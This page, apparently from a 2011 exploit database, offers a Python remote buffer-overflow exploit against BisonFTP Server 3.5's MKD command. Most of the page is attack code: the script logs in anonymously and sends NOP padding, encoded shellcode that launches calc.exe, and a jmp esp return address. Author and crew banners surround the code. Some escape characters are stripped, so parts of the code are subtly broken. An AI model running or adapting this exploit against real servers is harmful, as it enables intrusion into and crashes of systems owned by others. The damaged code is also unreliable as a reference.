Home / exploitsPDF  

BisonFTP 3.5 Buffer Overflow

Posted on 03 September 2011

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : BisonFTP Server v3.5 (MKD) Remote BOF and Crash Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Buffer Overflow ( in MKD command)
# Tested on : Windows XP SP3 (en)
##

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###

#=====[ Exploit Code ]======>

#!/usr/bin/python

# BisonFTP Server v3.5 (MKD) Remote BOF and Crash Exploit
# Provided by : KedAns-Dz * Inj3ct0r Team

from socket import *
import sys, struct, os, time

if (len(sys.argv) < 3):
print "
 BisonFTP Server v3.5 (MKD) Remote BOF and Crash Exploit"
print "
	Usage: %s <host> <port> 
" %(sys.argv[0])
sys.exit()

print "
[!] Connecting to %s ..." %(sys.argv[1])

# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(3)

buffer = "x90" * 1337 # padding

# windows/exec | cmd=calc.exe | x86/shikata_ga_nai (http://metasploit.com)
buffer += ("x2bxc9xb1x33xdaxd8xbexd9x73x14x79xd9x74x24"+
"xf4x5ax83xeaxfcx31x72x0fx03xabx7cxf6x8cxb7"+
"x6bx7fx6ex47x6cxe0xe6xa2x5dx32x9cxa7xccx82"+
"xd6xe5xfcx69xbax1dx76x1fx13x12x3fxaax45x1d"+
"xc0x1ax4axf1x02x3cx36x0bx57x9ex07xc4xaaxdf"+
"x40x38x44x8dx19x37xf7x22x2dx05xc4x43xe1x02"+
"x74x3cx84xd4x01xf6x87x04xb9x8dxc0xbcxb1xca"+
"xf0xbdx16x09xccxf4x13xfaxa6x07xf2x32x46x36"+
"x3ax98x79xf7xb7xe0xbex3fx28x97xb4x3cxd5xa0"+
"x0ex3fx01x24x93xe7xc2x9ex77x16x06x78xf3x14"+
"xe3x0ex5bx38xf2xc3xd7x44x7fxe2x37xcdx3bxc1"+
"x93x96x98x68x85x72x4ex94xd5xdax2fx30x9dxc8"+
"x24x42xfcx86xbbxc6x7axefxbcxd8x84x5fxd5xe9"+
"x0fx30xa2xf5xc5x75x5cxbcx44xdfxf5x19x1dx62"+
"x98x99xcbxa0xa5x19xfex58x52x01x8bx5dx1ex85"+
"x67x2fx0fx60x88x9cx30xa1xebx43xa3x29xc2xe6"+
"x43xcbx1a")


buffer += "x90" * 8 # nopsled

buffer += "x75x74xb9x7c" # jmp esp - (SHELL32.DLL)

buffer += "x0a" # end connection

# send buffer
print "[!] Sending exploit..."
sock.recv(2000)
sock.send('USER anonymous
')
sock.recv(2000)
sock.send('PASS anonymous
')
sock.recv(2000)
sock.send('MKD'+buffer+'
')
sock.recv(2000)
sock.close()
print "[!] Exploit succeed.
" %(sys.argv[1])
sys.exit()

#=====[ The End ]=======|

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================

 

TOP

Malware :

Exploits :